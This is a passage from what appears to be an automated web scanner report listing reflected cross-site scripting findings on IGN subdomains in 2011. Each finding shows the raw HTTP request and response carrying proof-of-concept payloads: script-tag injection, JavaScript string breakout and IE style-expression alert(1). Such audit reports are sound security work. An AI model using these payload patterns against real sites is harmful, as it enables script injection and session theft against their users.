Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=10000001&pos=leaderboard&rnd=167275655
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Feb 2011 00:56:27 GMT
Date: Mon, 07 Feb 2011 00:56:27 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035537", c3:"4732978", c4:"40554329", c5:"56586626", c6:"518e0<script>alert(1)</script>654ad6dd3fa", c10:"", c15:"", c16:"", r:""});

1.62. http://bluray.ign.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bluray.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21b33"><script>alert(1)</script>a678f7db862 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?21b33"><script>alert(1)</script>a678f7db862=1 HTTP/1.1
Host: bluray.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:11:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:11:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-24030-1808292441-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:11:43 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041103254v-1n-12mc+1297041103254mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 143858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Blu-ray Movies
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://bluray.ign.com/?21b33"><script>alert(1)</script>a678f7db862=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.63. http://bluray.ign.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bluray.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 495f9"-alert(1)-"4ec9ce9d1ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?495f9"-alert(1)-"4ec9ce9d1ca=1 HTTP/1.1
Host: bluray.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:11:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:11:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c05-26779-1542844299-4;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:11:45 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041105410v-1n-12mc+1297041105410mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 143624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Blu-ray Movies
...[SNIP]...
<script>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://bluray.ign.com/?495f9"-alert(1)-"4ec9ce9d1ca=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.64. http://bluray.ign.com/index/release.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bluray.ign.com
Path:   /index/release.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14dc3"-alert(1)-"2d159836ba5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/release.html?14dc3"-alert(1)-"2d159836ba5=1 HTTP/1.1
Host: bluray.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:11:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:11:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c08-31833-708344065-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:11:37 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041097167v-1n-12mc+1297041097167mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Set-Cookie: JSESSIONID=392i6mtw1xkxs;Path=/indx
Set-Cookie: JSESSIONID=sa1lw7gadr04;Path=/indx
Content-Length: 140527

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Blu-ray Movies
...[SNIP]...
of _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://bluray.ign.com/index/release.html?14dc3"-alert(1)-"2d159836ba5=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.65. http://bluray.ign.com/index/release.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bluray.ign.com
Path:   /index/release.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b279d"><script>alert(1)</script>bce7cd5b7fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/release.html?b279d"><script>alert(1)</script>bce7cd5b7fe=1 HTTP/1.1
Host: bluray.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:11:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:11:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c06-15004-580806984-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:11:27 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041087804v-1n-12mc+1297041087804mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Set-Cookie: JSESSIONID=1n5f961d6asqp;Path=/indx
Set-Cookie: JSESSIONID=5ssan89s25ovo;Path=/indx
Content-Length: 140589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Blu-ray Movies
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://bluray.ign.com/index/release.html?b279d"><script>alert(1)</script>bce7cd5b7fe=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.66. http://bluray.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bluray.ign.com
Path:   /index/reviews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e16e1"-alert(1)-"bdf7753c49f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/reviews.html?e16e1"-alert(1)-"bdf7753c49f=1 HTTP/1.1
Host: bluray.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:11:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:11:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-22919-811178274-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:11:31 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041091153v-1n-12mc+1297041091153mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 114854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Blu-ray Movies
...[SNIP]...
of _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://bluray.ign.com/index/reviews.html?e16e1"-alert(1)-"bdf7753c49f=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.67. http://bluray.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bluray.ign.com
Path:   /index/reviews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ff20"><script>alert(1)</script>c3a11347216 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/reviews.html?4ff20"><script>alert(1)</script>c3a11347216=1 HTTP/1.1
Host: bluray.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:11:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:11:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c05-26185-1640144759-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:11:24 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041084196v-1n-12mc+1297041084196mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 114915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Blu-ray Movies
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://bluray.ign.com/index/reviews.html?4ff20"><script>alert(1)</script>c3a11347216=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.68. http://boards.ign.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boards.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a633f"style%3d"x%3aexpression(alert(1))"c7f6defbe5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a633f"style="x:expression(alert(1))"c7f6defbe5b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?a633f"style%3d"x%3aexpression(alert(1))"c7f6defbe5b=1 HTTP/1.1
Host: boards.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:11:37 GMT
Server: Microsoft-IIS/6.0
p3p:CP='NOI ADMa OUR STP'
X-Powered-By:ASP.NET
cluster-server:ignprdappw64212
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="TST"
X-AspNetMvc-Version: 1.0
Set-Cookie: BoardCookieV3%5Fboards%2Eign%2Ecom=dc=no&ra=False; expires=Tue, 07-Feb-2012 01:11:37 GMT; path=/; HttpOnly
Set-Cookie: CategoryView=-1; path=/
Cache-Control: private
Expires: Wed, 07 Feb 2001 01:11:37 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 146861


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   

IGN Board
...[SNIP]...
<a href="/User/ChangeTheme?theme=Ign2009&returnUrl=http://boards.ign.com/?a633f"style="x:expression(alert(1))"c7f6defbe5b=1&x=1" title="Switch to the white theme">
...[SNIP]...

1.69. http://boards.ign.com/comics_boards/c5025 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boards.ign.com
Path:   /comics_boards/c5025

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 144d2"style%3d"x%3aexpression(alert(1))"dc6fedb49ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 144d2"style="x:expression(alert(1))"dc6fedb49ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /comics_boards/c5025?144d2"style%3d"x%3aexpression(alert(1))"dc6fedb49ed=1 HTTP/1.1
Host: boards.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:11:45 GMT
Server: Microsoft-IIS/6.0
p3p:CP='NOI ADMa OUR STP'
X-Powered-By:ASP.NET
cluster-server:ignprdappw64212
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="TST"
X-AspNetMvc-Version: 1.0
Set-Cookie: BoardCookieV3%5Fboards%2Eign%2Ecom=dc=no&ra=False; expires=Tue, 07-Feb-2012 01:11:45 GMT; path=/; HttpOnly
Set-Cookie: CategoryView=5025; path=/
Cache-Control: private
Expires: Wed, 07 Feb 2001 01:11:45 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 70922


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
Comics Boards -
...[SNIP]...
<a href="/User/ChangeTheme?theme=Ign2009&returnUrl=http://boards.ign.com/comics_boards/c5025?144d2"style="x:expression(alert(1))"dc6fedb49ed=1&x=1" title="Switch to the white theme">
...[SNIP]...

1.70. http://boards.ign.com/game_help_community_board/b5143/p1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boards.ign.com
Path:   /game_help_community_board/b5143/p1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a579"style%3d"x%3aexpression(alert(1))"dd2c3a9596f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6a579"style="x:expression(alert(1))"dd2c3a9596f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /game_help_community_board/b5143/p1?6a579"style%3d"x%3aexpression(alert(1))"dd2c3a9596f=1 HTTP/1.1
Host: boards.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:11:47 GMT
Server: Microsoft-IIS/6.0
p3p:CP='NOI ADMa OUR STP'
X-Powered-By:ASP.NET
cluster-server:ignprdappw64212
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="TST"
X-AspNetMvc-Version: 1.0
Set-Cookie: BoardCookieV3%5Fboards%2Eign%2Ecom=dc=no&ra=False&brd5143=665860307; expires=Tue, 07-Feb-2012 01:11:47 GMT; path=/; HttpOnly
Set-Cookie: BoardCookieV3%5Fboards%2Eign%2Ecom=dc=no&ra=False&brd5143=665860307; expires=Tue, 07-Feb-2012 01:11:47 GMT; path=/; HttpOnly
Set-Cookie: CategoryView=5033; path=/
Cache-Control: private
Expires: Wed, 07 Feb 2001 01:11:47 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 108756


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
Game Help Commu
...[SNIP]...
<a href="/User/ChangeTheme?theme=Ign2009&returnUrl=http://boards.ign.com/game_help_community_board/b5143/p1?6a579"style="x:expression(alert(1))"dd2c3a9596f=1&x=1" title="Switch to the white theme">
...[SNIP]...

1.71. http://boards.ign.com/general_game_help_board/b5030/p1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boards.ign.com
Path:   /general_game_help_board/b5030/p1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fb1e"style%3d"x%3aexpression(alert(1))"4e68eab179b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7fb1e"style="x:expression(alert(1))"4e68eab179b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /general_game_help_board/b5030/p1?7fb1e"style%3d"x%3aexpression(alert(1))"4e68eab179b=1 HTTP/1.1
Host: boards.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:11:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET 2.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="TST"
X-AspNetMvc-Version: 1.0
Set-Cookie: BoardCookieV3%5Fboards%2Eign%2Ecom=dc=no&ra=False&brd5030=665860304; expires=Tue, 07-Feb-2012 01:11:44 GMT; path=/; HttpOnly
Set-Cookie: BoardCookieV3%5Fboards%2Eign%2Ecom=dc=no&ra=False&brd5030=665860304; expires=Tue, 07-Feb-2012 01:11:44 GMT; path=/; HttpOnly
Set-Cookie: CategoryView=5033; path=/
Cache-Control: private
Expires: Wed, 07 Feb 2001 01:11:44 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 90419


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
General Game He
...[SNIP]...
<a href="/User/ChangeTheme?theme=Ign2009&returnUrl=http://boards.ign.com/general_game_help_board/b5030/p1?7fb1e"style="x:expression(alert(1))"4e68eab179b=1&x=1" title="Switch to the white theme">
...[SNIP]...

1.72. http://boards.ign.com/movies/c5017 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boards.ign.com
Path:   /movies/c5017

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d75b7"style%3d"x%3aexpression(alert(1))"f3c2560ab6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d75b7"style="x:expression(alert(1))"f3c2560ab6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /movies/c5017?d75b7"style%3d"x%3aexpression(alert(1))"f3c2560ab6a=1 HTTP/1.1
Host: boards.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:11:43 GMT
Server: Microsoft-IIS/6.0
p3p:CP='NOI ADMa OUR STP'
X-Powered-By:ASP.NET
cluster-server:ignprdappw64212
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="TST"
X-AspNetMvc-Version: 1.0
Set-Cookie: BoardCookieV3%5Fboards%2Eign%2Ecom=dc=no&ra=False; expires=Tue, 07-Feb-2012 01:11:43 GMT; path=/; HttpOnly
Set-Cookie: CategoryView=5017; path=/
Cache-Control: private
Expires: Wed, 07 Feb 2001 01:11:43 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 68578


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
Movies - IGN Bo
...[SNIP]...
<a href="/User/ChangeTheme?theme=Ign2009&returnUrl=http://boards.ign.com/movies/c5017?d75b7"style="x:expression(alert(1))"f3c2560ab6a=1&x=1" title="Switch to the white theme">
...[SNIP]...

1.73. http://boards.ign.com/nintendo_wii_ds_boards/c5062 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boards.ign.com
Path:   /nintendo_wii_ds_boards/c5062

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eab04"style%3d"x%3aexpression(alert(1))"24a467ebcbc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eab04"style="x:expression(alert(1))"24a467ebcbc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /nintendo_wii_ds_boards/c5062?eab04"style%3d"x%3aexpression(alert(1))"24a467ebcbc=1 HTTP/1.1
Host: boards.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:11:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET 2.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="TST"
X-AspNetMvc-Version: 1.0
Set-Cookie: BoardCookieV3%5Fboards%2Eign%2Ecom=dc=no&ra=False; expires=Tue, 07-Feb-2012 01:11:37 GMT; path=/; HttpOnly
Set-Cookie: CategoryView=5062; path=/
Cache-Control: private
Expires: Wed, 07 Feb 2001 01:11:37 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 77313


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
Nintendo Wii &a
...[SNIP]...
<a href="/User/ChangeTheme?theme=Ign2009&returnUrl=http://boards.ign.com/nintendo_wii_ds_boards/c5062?eab04"style="x:expression(alert(1))"24a467ebcbc=1&x=1" title="Switch to the white theme">
...[SNIP]...

1.74. http://boards.ign.com/pc_games_and_more/c5060 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boards.ign.com
Path:   /pc_games_and_more/c5060

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 771e2"style%3d"x%3aexpression(alert(1))"7f50f9fa2d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 771e2"style="x:expression(alert(1))"7f50f9fa2d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /pc_games_and_more/c5060?771e2"style%3d"x%3aexpression(alert(1))"7f50f9fa2d2=1 HTTP/1.1
Host: boards.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:11:33 GMT
Server: Microsoft-IIS/6.0
p3p:CP='NOI ADMa OUR STP'
X-Powered-By:ASP.NET
cluster-server:ignprdappw64212
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="TST"
X-AspNetMvc-Version: 1.0
Set-Cookie: BoardCookieV3%5Fboards%2Eign%2Ecom=dc=no&ra=False; expires=Tue, 07-Feb-2012 01:11:33 GMT; path=/; HttpOnly
Set-Cookie: CategoryView=5060; path=/
Cache-Control: private
Expires: Wed, 07 Feb 2001 01:11:33 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 76348


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
PC Games and Mo
...[SNIP]...
